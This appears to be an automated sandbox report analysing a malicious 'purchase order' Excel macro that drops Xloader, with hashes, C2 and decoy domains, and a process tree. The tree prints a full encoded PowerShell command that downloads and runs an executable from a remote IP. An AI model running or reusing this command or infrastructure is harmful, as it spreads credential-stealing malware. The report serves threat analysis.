Analysis

  • max time kernel
    300s
  • max time network
    270s
  • platform
    windows7_x64
  • resource
    win7-en-20210920
  • submitted
    28-10-2021 19:18

General

  • Target

    Purchase order 45037966707/Purchase order 45037966707.xlsm

  • Size

    22KB

  • MD5

    9fc5194e1a01302c4495dfeb12f47085

  • SHA1

    d61c8d632c0b6a1395d4c8e7702bb93f11e5c318

  • SHA256

    37ea86d0e937ae285a463cf50c529ca69d6621f49c34e03b407fc2726b292d0c

  • SHA512

    1e06c982cc4907a0d343324fd022d549545c74879bc57b2b2350c84ce42da3917a5dde889ff3b1511b52cf58eb1c9aad5d41bf49b8dad2aa407510ecc0b8c505

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://20.102.53.71/mvn/systemdc.exe

Extracted

Family

xloader

Version

2.5

Campaign

pufi

C2

http://www.homestechs.com/pufi/

Decoy

fusiongroupgames.net

hugevari.com

rebeccagriffiths.com

trocaoferta.com

theslashapp.com

codezonesoftware.xyz

sottocommunications.com

minicreators.online

course2millions.com

hfm5n1dhkjqwpe.xyz

xlab-ub.com

silvanaribeirocake.com

thefabinteriordesign.com

mg-leadership.com

petbort.com

ndust.net

203040302.xyz

jakital.com

shophuunghia.info

rednacionaldejuecesrd.net

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Xloader

    Xloader is a rebranded version of Formbook malware.

  • Xloader Payload 4 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 2 IoCs
  • Deletes itself 1 IoCs
  • Loads dropped DLL 1 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • NTFS ADS 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 54 IoCs
  • Suspicious behavior: MapViewOfSection 6 IoCs
  • Suspicious behavior: RenamesItself 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 27 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1408
    • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
      "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde "C:\Users\Admin\AppData\Local\Temp\Purchase order 45037966707\Purchase order 45037966707.xlsm"
      2⤵
      • Deletes itself
      • Enumerates system info in registry
      • Modifies Internet Explorer settings
      • Modifies registry class
      • NTFS ADS
      • Suspicious behavior: AddClipboardFormatListener
      • Suspicious behavior: RenamesItself
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:668
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c Bqzazthpkhjgkygrz.bat
        3⤵
        • Process spawned unexpected child process
        • Suspicious use of WriteProcessMemory
        PID:1048
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -win 1 -enc JABQAHIAbwBjAE4AYQBtAGUAIAA9ACAAIgBFAGsAegBqAGcAbABsAHMAawBnAG4AagBtAHgAYwBnAHEAdgBvAHIALgBlAHgAZQAiADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACIAaAB0AHQAcAA6AC8ALwAyADAALgAxADAAMgAuADUAMwAuADcAMQAvAG0AdgBuAC8AcwB5AHMAdABlAG0AZABjAC4AZQB4AGUAIgAsACIAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXAAkAFAAcgBvAGMATgBhAG0AZQAiACkAOwBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAKAAiACQAZQBuAHYAOgBBAFAAUABEAEEAVABBAFwAJABQAHIAbwBjAE4AYQBtAGUAIgApAA==
          4⤵
          • Blocklisted process makes network request
          • Loads dropped DLL
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1172
          • C:\Users\Admin\AppData\Roaming\Ekzjgllskgnjmxcgqvor.exe
            "C:\Users\Admin\AppData\Roaming\Ekzjgllskgnjmxcgqvor.exe"
            5⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • Suspicious use of WriteProcessMemory
            PID:1316
            • C:\Users\Admin\AppData\Roaming\Ekzjgllskgnjmxcgqvor.exe
              "C:\Users\Admin\AppData\Roaming\Ekzjgllskgnjmxcgqvor.exe"
              6⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious behavior: MapViewOfSection
              • Suspicious use of AdjustPrivilegeToken
              PID:1468
    • C:\Windows\SysWOW64\raserver.exe
      "C:\Windows\SysWOW64\raserver.exe"
      2⤵
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:340
      • C:\Windows\SysWOW64\cmd.exe
        /c del "C:\Users\Admin\AppData\Roaming\Ekzjgllskgnjmxcgqvor.exe"
        3⤵
          PID:1996

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Defense Evasion

    Modify Registry

    1
    T1112

    Discovery

    Query Registry

    1
    T1012

    System Information Discovery

    1
    T1082

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Ekzjgllskgnjmxcgqvor.exe
      MD5

      91679f42cd3ba051b5c7ce37d45b222c

      SHA1

      decc607894a299033ed3ede115a3bce51d21020b

      SHA256

      e059ab9141d67e0b2e9eb83d34ba88e480f7091bcd97b78466386a17b44a235e

      SHA512

      b3dd48fc2267a50e9468e0e0be746e224618fd4aaab07e69c3f32c473831145a9fdd6a4cf87266f284bed9c9d1bf227f21f244d15242582f096dc4bf9c64855a

    • C:\Users\Admin\AppData\Roaming\Ekzjgllskgnjmxcgqvor.exe
      MD5

      91679f42cd3ba051b5c7ce37d45b222c

      SHA1

      decc607894a299033ed3ede115a3bce51d21020b

      SHA256

      e059ab9141d67e0b2e9eb83d34ba88e480f7091bcd97b78466386a17b44a235e

      SHA512

      b3dd48fc2267a50e9468e0e0be746e224618fd4aaab07e69c3f32c473831145a9fdd6a4cf87266f284bed9c9d1bf227f21f244d15242582f096dc4bf9c64855a

    • C:\Users\Admin\AppData\Roaming\Ekzjgllskgnjmxcgqvor.exe
      MD5

      91679f42cd3ba051b5c7ce37d45b222c

      SHA1

      decc607894a299033ed3ede115a3bce51d21020b

      SHA256

      e059ab9141d67e0b2e9eb83d34ba88e480f7091bcd97b78466386a17b44a235e

      SHA512

      b3dd48fc2267a50e9468e0e0be746e224618fd4aaab07e69c3f32c473831145a9fdd6a4cf87266f284bed9c9d1bf227f21f244d15242582f096dc4bf9c64855a

    • C:\Users\Admin\Documents\Bqzazthpkhjgkygrz.bat
      MD5

      996c0a65e6b3332e0ae7233f45828afb

      SHA1

      3b4d9f7bb3d2ba83badd39e69fac2852808d6407

      SHA256

      05a5000a91b73c130b33fed9b9746a20522dab0e9c769064831a567e00fec694

      SHA512

      0888baee5736ccdaec9e974cbbbdae6c4a0fa7a6cab99b0973101c5d756b8b0880e6f6869fc17491c9c82af96443e3fecb31e3ae0e3c04968f5ce826ba7c33eb

    • \Users\Admin\AppData\Roaming\Ekzjgllskgnjmxcgqvor.exe
      MD5

      91679f42cd3ba051b5c7ce37d45b222c

      SHA1

      decc607894a299033ed3ede115a3bce51d21020b

      SHA256

      e059ab9141d67e0b2e9eb83d34ba88e480f7091bcd97b78466386a17b44a235e

      SHA512

      b3dd48fc2267a50e9468e0e0be746e224618fd4aaab07e69c3f32c473831145a9fdd6a4cf87266f284bed9c9d1bf227f21f244d15242582f096dc4bf9c64855a

    • memory/340-87-0x0000000000080000-0x00000000000A9000-memory.dmp
      Filesize

      164KB

    • memory/340-86-0x0000000000E10000-0x0000000000E2C000-memory.dmp
      Filesize

      112KB

    • memory/340-83-0x0000000000000000-mapping.dmp
    • memory/340-88-0x0000000000B00000-0x0000000000E03000-memory.dmp
      Filesize

      3.0MB

    • memory/340-89-0x0000000000900000-0x0000000000990000-memory.dmp
      Filesize

      576KB

    • memory/668-54-0x000000002F501000-0x000000002F504000-memory.dmp
      Filesize

      12KB

    • memory/668-56-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

    • memory/668-55-0x0000000071C51000-0x0000000071C53000-memory.dmp
      Filesize

      8KB

    • memory/1048-57-0x0000000000000000-mapping.dmp
    • memory/1172-60-0x00000000765A1000-0x00000000765A3000-memory.dmp
      Filesize

      8KB

    • memory/1172-61-0x00000000022D0000-0x0000000002F1A000-memory.dmp
      Filesize

      12.3MB

    • memory/1172-59-0x0000000000000000-mapping.dmp
    • memory/1316-70-0x0000000000C60000-0x0000000000CAB000-memory.dmp
      Filesize

      300KB

    • memory/1316-69-0x0000000000410000-0x0000000000416000-memory.dmp
      Filesize

      24KB

    • memory/1316-68-0x0000000000A50000-0x0000000000A51000-memory.dmp
      Filesize

      4KB

    • memory/1316-66-0x0000000001040000-0x0000000001041000-memory.dmp
      Filesize

      4KB

    • memory/1316-63-0x0000000000000000-mapping.dmp
    • memory/1408-82-0x0000000008130000-0x0000000008260000-memory.dmp
      Filesize

      1.2MB

    • memory/1408-79-0x0000000007FA0000-0x0000000008125000-memory.dmp
      Filesize

      1.5MB

    • memory/1468-71-0x0000000000400000-0x0000000000429000-memory.dmp
      Filesize

      164KB

    • memory/1468-81-0x0000000000310000-0x0000000000321000-memory.dmp
      Filesize

      68KB

    • memory/1468-80-0x0000000000400000-0x0000000000429000-memory.dmp
      Filesize

      164KB

    • memory/1468-78-0x0000000000210000-0x0000000000221000-memory.dmp
      Filesize

      68KB

    • memory/1468-77-0x00000000008C0000-0x0000000000BC3000-memory.dmp
      Filesize

      3.0MB

    • memory/1468-74-0x000000000041D450-mapping.dmp
    • memory/1468-73-0x0000000000400000-0x0000000000429000-memory.dmp
      Filesize

      164KB

    • memory/1468-72-0x0000000000400000-0x0000000000429000-memory.dmp
      Filesize

      164KB

    • memory/1996-85-0x0000000000000000-mapping.dmp